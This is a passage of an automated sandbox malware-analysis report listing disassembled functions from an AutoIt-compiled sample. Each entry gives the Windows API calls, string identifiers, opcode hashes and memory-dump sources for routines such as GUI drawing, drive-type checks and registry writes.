                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                      • API String ID: 2910397461-517079104
                                                                      • Opcode ID: 5259453a481c0000c11837491c6764af6fad58ae3d28e2b03a1771b558b2c703
                                                                      • Instruction ID: cb8c222c7c5131809b135746961c38c66b87a70e15164f491fe4c8daf6dae4cd
                                                                      • Opcode Fuzzy Hash: 5259453a481c0000c11837491c6764af6fad58ae3d28e2b03a1771b558b2c703
                                                                      • Instruction Fuzzy Hash: 87B15B71A50215AFEB14DF68DC8AFAE7BB9EB09710F048154F915E72A0DB74ED40CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C14ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C14AED
                                                                      • GetDriveTypeW.KERNEL32(?,00C3CB68,?,\\.\,00C3CC08), ref: 00C14BCA
                                                                      • SetErrorMode.KERNEL32(00000000,00C3CB68,?,\\.\,00C3CC08), ref: 00C14D36
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DriveType
                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                      • API String ID: 2907320926-4222207086
                                                                      • Opcode ID: 57b4c045b1501a2743f8e3420ce2fcd51f30741f0536420e79846370cf403c62
                                                                      • Instruction ID: 56c3de8e40159a8a9b0a22df85e0cbe10a3114e2ebdd552de4e068d2ebd8b569
                                                                      • Opcode Fuzzy Hash: 57b4c045b1501a2743f8e3420ce2fcd51f30741f0536420e79846370cf403c62
                                                                      • Instruction Fuzzy Hash: 1D61B370709105EBCB18DF25CAE1DEDB7A1EB47740B2484A5F806AB291DB35DE81FB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C373E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSysColor.USER32 ref: 00C37421
                                                                      • SetTextColor.GDI32(?,?), ref: 00C37425
                                                                      • GetSysColorBrush.USER32 ref: 00C3743B
                                                                      • GetSysColor.USER32 ref: 00C37446
                                                                      • CreateSolidBrush.GDI32(?), ref: 00C3744B
                                                                      • GetSysColor.USER32 ref: 00C37463
                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C37471
                                                                      • SelectObject.GDI32(?,00000000), ref: 00C37482
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00C3748B
                                                                      • SelectObject.GDI32(?,?), ref: 00C37498
                                                                      • InflateRect.USER32 ref: 00C374B7
                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C374CE
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00C374DB
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C3752A
                                                                      • GetWindowTextW.USER32 ref: 00C37554
                                                                      • InflateRect.USER32 ref: 00C37572
                                                                      • DrawFocusRect.USER32 ref: 00C3757D
                                                                      • GetSysColor.USER32 ref: 00C3758E
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00C37596
                                                                      • DrawTextW.USER32(?,00C370F5,000000FF,?,00000000), ref: 00C375A8
                                                                      • SelectObject.GDI32(?,?), ref: 00C375BF
                                                                      • DeleteObject.GDI32(?), ref: 00C375CA
                                                                      • SelectObject.GDI32(?,?), ref: 00C375D0
                                                                      • DeleteObject.GDI32(?), ref: 00C375D5
                                                                      • SetTextColor.GDI32(?,?), ref: 00C375DB
                                                                      • SetBkColor.GDI32(?,?), ref: 00C375E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 1996641542-0
                                                                      • Opcode ID: 61fd5ebe5afb4d788003a89527a5e15251b83f870c67544fe6ec8044d3603fe0
                                                                      • Instruction ID: d35e5c2ff13cb40909102dd618a18de5befe2a87a5f567be92ffd9d92905e41d
                                                                      • Opcode Fuzzy Hash: 61fd5ebe5afb4d788003a89527a5e15251b83f870c67544fe6ec8044d3603fe0
                                                                      • Instruction Fuzzy Hash: E1615D72910218AFDF119FA4DC89BEE7FB9EB08320F114215F915BB2A1D775A940DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C30FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 00C31128
                                                                      • GetDesktopWindow.USER32 ref: 00C3113D
                                                                      • GetWindowRect.USER32(00000000), ref: 00C31144
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00C31199
                                                                      • DestroyWindow.USER32 ref: 00C311B9
                                                                      • CreateWindowExW.USER32 ref: 00C311ED
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C3120B
                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C3121D
                                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00C31232
                                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00C31245
                                                                      • IsWindowVisible.USER32(00000000), ref: 00C312A1
                                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00C312BC
                                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00C312D0
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00C312E8
                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00C3130E
                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00C31328
                                                                      • CopyRect.USER32(?,?), ref: 00C3133F
                                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 00C313AA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                      • String ID: ($0$tooltips_class32
                                                                      • API String ID: 698492251-4156429822
                                                                      • Opcode ID: 476dcd323971419671ecc3b50e9e341793ffe8ce06cc54779d8ecc9dd49dfdb3
                                                                      • Instruction ID: e6d9c4972b366d5adbedbbb57fc469153d87fe817718b4ec65444a05bf1f6cda
                                                                      • Opcode Fuzzy Hash: 476dcd323971419671ecc3b50e9e341793ffe8ce06cc54779d8ecc9dd49dfdb3
                                                                      • Instruction Fuzzy Hash: ACB19B71618341AFD704DF64C885BAEBBE4FF85310F04891CF999AB2A1CB31E944CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C30241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00C302E5
                                                                      • _wcslen.LIBCMT ref: 00C3031F
                                                                      • _wcslen.LIBCMT ref: 00C30389
                                                                      • _wcslen.LIBCMT ref: 00C303F1
                                                                      • _wcslen.LIBCMT ref: 00C30475
                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C304C5
                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C30504
                                                                        • Part of subcall function 00BBF9F2: _wcslen.LIBCMT ref: 00BBF9FD
                                                                        • Part of subcall function 00C0223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C02258
                                                                        • Part of subcall function 00C0223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C0228A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                      • API String ID: 1103490817-719923060
                                                                      • Opcode ID: 22957180cef18e82b594aa8b357e20b266065fbd4366b46fe8e5f498884b791f
                                                                      • Instruction ID: 8f96447136b9f5b661a1fe8e163d89043c95e3f2fd745ebe6d19adfe252de25c
                                                                      • Opcode Fuzzy Hash: 22957180cef18e82b594aa8b357e20b266065fbd4366b46fe8e5f498884b791f
                                                                      • Instruction Fuzzy Hash: 5BE1B4322282019FC714DF24C4A197EB7E5BF98714F24495CF8A69B7A6D730EE45CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BB8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32 ref: 00BB8968
                                                                      • GetSystemMetrics.USER32 ref: 00BB8970
                                                                      • SystemParametersInfoW.USER32 ref: 00BB899B
                                                                      • GetSystemMetrics.USER32 ref: 00BB89A3
                                                                      • GetSystemMetrics.USER32 ref: 00BB89C8
                                                                      • SetRect.USER32 ref: 00BB89E5
                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BB89F5
                                                                      • CreateWindowExW.USER32 ref: 00BB8A28
                                                                      • SetWindowLongW.USER32 ref: 00BB8A3C
                                                                      • GetClientRect.USER32 ref: 00BB8A5A
                                                                      • GetStockObject.GDI32(00000011), ref: 00BB8A76
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB8A81
                                                                        • Part of subcall function 00BB912D: GetCursorPos.USER32(?), ref: 00BB9141
                                                                        • Part of subcall function 00BB912D: ScreenToClient.USER32(00000000,?), ref: 00BB915E
                                                                        • Part of subcall function 00BB912D: GetAsyncKeyState.USER32 ref: 00BB9183
                                                                        • Part of subcall function 00BB912D: GetAsyncKeyState.USER32 ref: 00BB919D
                                                                      • SetTimer.USER32(00000000,00000000,00000028,00BB90FC), ref: 00BB8AA8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                      • String ID: AutoIt v3 GUI
                                                                      • API String ID: 1458621304-248962490
                                                                      • Opcode ID: b06a577f2a52a9e2cb8e372e886614d2a87d85fa65b6205c0f5aed8556a2e57d
                                                                      • Instruction ID: e75b06b0fa50b38b278c4ef6c3422bcb54f8c9b832887e54a72af96a54a877c8
                                                                      • Opcode Fuzzy Hash: b06a577f2a52a9e2cb8e372e886614d2a87d85fa65b6205c0f5aed8556a2e57d
                                                                      • Instruction Fuzzy Hash: B9B13675A0020AAFDF14DFA8DC85BBE3BF5EB48314F144269FE19A7290DB74A841CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C00D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C01114
                                                                        • Part of subcall function 00C010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01120
                                                                        • Part of subcall function 00C010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C0112F
                                                                        • Part of subcall function 00C010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01136
                                                                        • Part of subcall function 00C010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C0114D
                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C00DF5
                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C00E29
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C00E40
                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00C00E7A
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C00E96
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C00EAD
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C00EB5
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00C00EBC
                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C00EDD
                                                                      • CopySid.ADVAPI32(00000000), ref: 00C00EE4
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C00F13
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C00F35
                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C00F47
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00F6E
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C00F75
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00F7E
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C00F85
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00F8E
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C00F95
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00C00FA1
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C00FA8
                                                                        • Part of subcall function 00C01193: GetProcessHeap.KERNEL32(00000008,00C00BB1,?,00000000,?,00C00BB1,?), ref: 00C011A1
                                                                        • Part of subcall function 00C01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C00BB1,?), ref: 00C011A8
                                                                        • Part of subcall function 00C01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C00BB1,?), ref: 00C011B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 4175595110-0
                                                                      • Opcode ID: 03bbf9fb776f00509f86d0f3de828a6875590cdaddb44079167765916421d22b
                                                                      • Instruction ID: 0b47de9634c620b06575eae1293e1a23abf76ef26ab9e1f3c1ae081a716b0c55
                                                                      • Opcode Fuzzy Hash: 03bbf9fb776f00509f86d0f3de828a6875590cdaddb44079167765916421d22b
                                                                      • Instruction Fuzzy Hash: DD716A7290020AABDF20DFA4DC89FAEBBB8BF05301F254115FA69B6191D7319A15DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C2C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2C4BD
                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00C3CC08,00000000,?,00000000,?,?), ref: 00C2C544
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00C2C5A4
                                                                      • _wcslen.LIBCMT ref: 00C2C5F4
                                                                      • _wcslen.LIBCMT ref: 00C2C66F
                                                                      • RegSetValueExW.ADVAPI32 ref: 00C2C6B2
                                                                      • RegSetValueExW.ADVAPI32 ref: 00C2C7C1
                                                                      • RegSetValueExW.ADVAPI32 ref: 00C2C84D
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C2C881
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00C2C88E
                                                                      • RegSetValueExW.ADVAPI32 ref: 00C2C960
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                      • API String ID: 9721498-966354055
                                                                      • Opcode ID: 0b8525ce02e1bfa1089872eb39ad94d2cb172e25bdbabba13c75fd297cd83b05
                                                                      • Instruction ID: 110c80bf7668785137f4ef1412ac7170cc2a91d4a9a914954c28be1d465d8664
                                                                      • Opcode Fuzzy Hash: 0b8525ce02e1bfa1089872eb39ad94d2cb172e25bdbabba13c75fd297cd83b05
                                                                      • Instruction Fuzzy Hash: 6D1268356082119FCB14EF14D891B2EB7E5EF89714F04889DF89A9B7A2DB31ED41CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C3091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00C309C6
                                                                      • _wcslen.LIBCMT ref: 00C30A01
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C30A54
                                                                      • _wcslen.LIBCMT ref: 00C30A8A
                                                                      • _wcslen.LIBCMT ref: 00C30B06
                                                                      • _wcslen.LIBCMT ref: 00C30B81
                                                                        • Part of subcall function 00BBF9F2: _wcslen.LIBCMT ref: 00BBF9FD
                                                                        • Part of subcall function 00C02BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C02BFA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                      • API String ID: 1103490817-4258414348
                                                                      • Opcode ID: 5b9b73527012c06a2f3cabc3145765cb39f9a467f54cdd3a8ed3fdad194766c1
                                                                      • Instruction ID: b028082f003ceba19b6eb18301c30a7a76288cf39846e790836cec07c3be7201
                                                                      • Opcode Fuzzy Hash: 5b9b73527012c06a2f3cabc3145765cb39f9a467f54cdd3a8ed3fdad194766c1
                                                                      • Instruction Fuzzy Hash: 93E1B4322183018FC714DF25C4A196AB7E1FF95718F24499DF8A69B3A2D731EE45CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C2C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                      • API String ID: 1256254125-909552448
                                                                      • Opcode ID: 5d5fee430420bec35822f1e92f4ad70b6a4f1f4d1c5e7b7705f71f4e70825798
                                                                      • Instruction ID: b85f112ac694170af4ec1ec6d433e4d957815dc81f0e916352fac53878c2b00e
                                                                      • Opcode Fuzzy Hash: 5d5fee430420bec35822f1e92f4ad70b6a4f1f4d1c5e7b7705f71f4e70825798
                                                                      • Instruction Fuzzy Hash: F071043261413A8BCF20DE7CEDD16BE3391AF61794B250628F87697684EA71CF44D3A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C3833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00C3835A
                                                                      • _wcslen.LIBCMT ref: 00C3836E
                                                                      • _wcslen.LIBCMT ref: 00C38391
                                                                      • _wcslen.LIBCMT ref: 00C383B4
                                                                      • LoadImageW.USER32 ref: 00C383F2
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C35BF2), ref: 00C3844E
                                                                      • LoadImageW.USER32 ref: 00C38487
                                                                      • LoadImageW.USER32 ref: 00C384CA
                                                                      • LoadImageW.USER32 ref: 00C38501
                                                                      • FreeLibrary.KERNEL32(?), ref: 00C3850D
                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C3851D
                                                                      • DestroyIcon.USER32(?,?,?,?,?,00C35BF2), ref: 00C3852C
                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C38549
                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C38555
                                                                      Strings
                                                                      Memory Dump Source
